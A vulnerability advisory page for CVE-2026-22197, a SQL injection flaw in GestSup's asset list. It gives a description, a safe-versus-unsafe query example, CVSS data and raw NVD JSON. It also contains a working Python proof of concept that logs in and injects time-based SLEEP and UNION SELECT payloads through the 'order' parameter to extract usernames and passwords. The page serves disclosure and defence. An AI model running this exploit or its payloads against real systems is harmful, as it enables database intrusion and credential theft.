Security Vulnerability Report
CVE-2026-22197 CVSS 8.1 HIGH

CVE-2026-22197

Published: 2026-01-09 17:15:55
Last Modified: 2026-01-14 19:43:05

Description

GestSup versions prior to 3.2.60 contain multiple SQL injection vulnerabilities in the asset list functionality. Multiple request parameters used to filter, search, or sort assets are incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges.
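The description names the pattern, request parameters used to filter, search or sort being spliced into SQL text, and the standard fix is to bind values as query parameters and to check identifiers such as the sort column and direction against a fixed allow-list. The following is an added illustration of that vulnerable pattern beside its hardened form; it is not GestSup's code. The `assets` table, its rows and columns, and the helper function names are constructed for the example (the `search`, `order` and `sens` parameter names only mirror the request parameters used elsewhere on this page), and it runs against an in-memory SQLite database.

```python
import sqlite3

# Constructed sample schema and rows for this illustration (not GestSup's).
ASSETS = [
    (1, "laptop-01", "Dell", "in_use"),
    (2, "printer-03", "HP", "spare"),
    (3, "laptop-02", "Lenovo", "in_use"),
]

# Identifiers cannot be bound as query parameters, so the sort column and
# direction are validated against a fixed allow-list instead.
SORTABLE_COLUMNS = {"id", "name", "vendor", "status"}
DIRECTIONS = {"ASC", "DESC"}


def _connect():
    """Build a throwaway in-memory database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE assets (id INTEGER PRIMARY KEY, name TEXT, vendor TEXT, status TEXT)"
    )
    conn.executemany("INSERT INTO assets VALUES (?, ?, ?, ?)", ASSETS)
    return conn


def build_query_unsafe(search, order, sens):
    """The vulnerable pattern: request values spliced straight into SQL text.

    A quote inside `search` terminates the string literal early, and `order`
    and `sens` are emitted verbatim, so any of the three can change what the
    query means. This is the shape of defect the advisory describes.
    """
    return (
        "SELECT id, name, vendor, status FROM assets "
        f"WHERE name LIKE '%{search}%' ORDER BY {order} {sens}"
    )


def build_query_safe(search, order, sens):
    """Hardened form: bind the search value, allow-list the identifiers."""
    if order not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {order!r}")
    sens = sens.upper()
    if sens not in DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {sens!r}")
    # `order` and `sens` are now known-good literals from our own sets, so
    # interpolating them is safe; the user-supplied search term is bound.
    sql = (
        "SELECT id, name, vendor, status FROM assets "
        f"WHERE name LIKE ? ORDER BY {order} {sens}"
    )
    return sql, (f"%{search}%",)


def list_assets_unsafe(search, order="id", sens="ASC"):
    """Run the concatenated query; a stray quote in `search` breaks it."""
    conn = _connect()
    try:
        return conn.execute(build_query_unsafe(search, order, sens)).fetchall()
    finally:
        conn.close()


def list_assets_safe(search, order="id", sens="ASC"):
    """Run the parameterised, allow-listed query."""
    conn = _connect()
    try:
        sql, params = build_query_safe(search, order, sens)
        return conn.execute(sql, params).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    print(list_assets_safe("laptop", order="name", sens="desc"))
    try:
        list_assets_unsafe("O'Brien")  # the quote ends the literal early
    except sqlite3.OperationalError as exc:
        print("unsafe query failed:", exc)
    print(list_assets_safe("O'Brien"))  # bound value: simply no match
    try:
        list_assets_safe("laptop", order="nonexistent")
    except ValueError as exc:
        print("rejected:", exc)
```

The single quote in a name like `O'Brien` is enough to show the difference: the concatenated query is rejected by the database as malformed, while the bound version just returns no rows. For the sort parameters there is no placeholder syntax to fall back on, which is why the allow-list check is the only reliable control; the same applies to table names or any other identifier taken from a request.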

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:* - VULNERABLE
GestSup < 3.2.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22197 PoC - GestSup SQL Injection in Asset List
Author: VulnCheck
"""
import argparse
import time

import requests


def exploit_sql_injection(target_url, username, password):
    """
    Exploit SQL injection in GestSup asset list functionality
    """
    session = requests.Session()

    # Step 1: Authentication
    login_url = f"{target_url}/index.php?page=login"
    login_data = {
        'username': username,
        'password': password
    }
    print("[*] Authenticating to GestSup...")
    response = session.post(login_url, data=login_data)
    if 'logout' not in response.text.lower():
        print("[-] Authentication failed!")
        return None
    print("[+] Authentication successful!")

    # Step 2: SQL Injection in asset list sorting parameter
    asset_url = f"{target_url}/index.php?page=assets"
    # Payload: confirm the injection with a time-based blind probe
    # This payload works on MySQL databases
    sql_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a)---"
    print("[*] Sending SQL injection payload...")
    params = {
        'order': sql_payload,
        'sens': 'ASC'
    }
    start_time = time.time()
    response = session.get(asset_url, params=params, timeout=30)
    elapsed = time.time() - start_time
    if elapsed >= 5:
        print("[+] SQL Injection confirmed! Database is vulnerable.")
        print(f"[+] Time-based blind injection successful (delay: {elapsed:.2f}s)")

        # Step 3: Extract data using UNION-based injection
        # This payload attempts to extract user credentials
        union_payload = "1' UNION SELECT 1,2,username,password,5,6,7,8,9,10,11,12 FROM users---"
        params = {
            'order': union_payload,
            'sens': 'ASC'
        }
        print("[*] Extracting sensitive data...")
        response = session.get(asset_url, params=params)
        if 'admin' in response.text.lower() or 'password' in response.text.lower():
            print("[+] Data extraction successful!")

    return session.cookies


def main():
    parser = argparse.ArgumentParser(description='CVE-2026-22197 GestSup SQL Injection')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Username')
    parser.add_argument('-p', '--password', required=True, help='Password')
    args = parser.parse_args()
    exploit_sql_injection(args.target, args.username, args.password)


if __name__ == '__main__':
    main()

# Usage: python cve-2026-22197.py -t http://target-gestsup.com -u user -p password

References

https://gestsup.fr/index.php?page=changelog (Release Notes)
https://www.vulncheck.com/advisories/gestsup-multiple-sqli-in-asset-list (Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22197",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T17:15:55.170",
    "lastModified": "2026-01-14T19:43:05.013",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GestSup versions prior to 3.2.60 contain multiple SQL injection vulnerabilities in the asset list functionality. Multiple request parameters used to filter, search, or sort assets are incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges."
      },
      {
        "lang": "es",
        "value": "Las versiones de GestSup anteriores a la 3.2.60 contienen múltiples vulnerabilidades de inyección SQL en la funcionalidad de lista de activos. Múltiples parámetros de solicitud utilizados para filtrar, buscar o clasificar activos se incorporan en consultas SQL sin una neutralización suficiente, lo que permite a un atacante autenticado manipular las consultas de la base de datos. La explotación exitosa puede resultar en acceso no autorizado o modificación de los contenidos de la base de datos, dependiendo de los privilegios de la base de datos."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "3.2.56",
                "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gestsup.fr/index.php?page=changelog",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/gestsup-multiple-sqli-in-asset-list",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}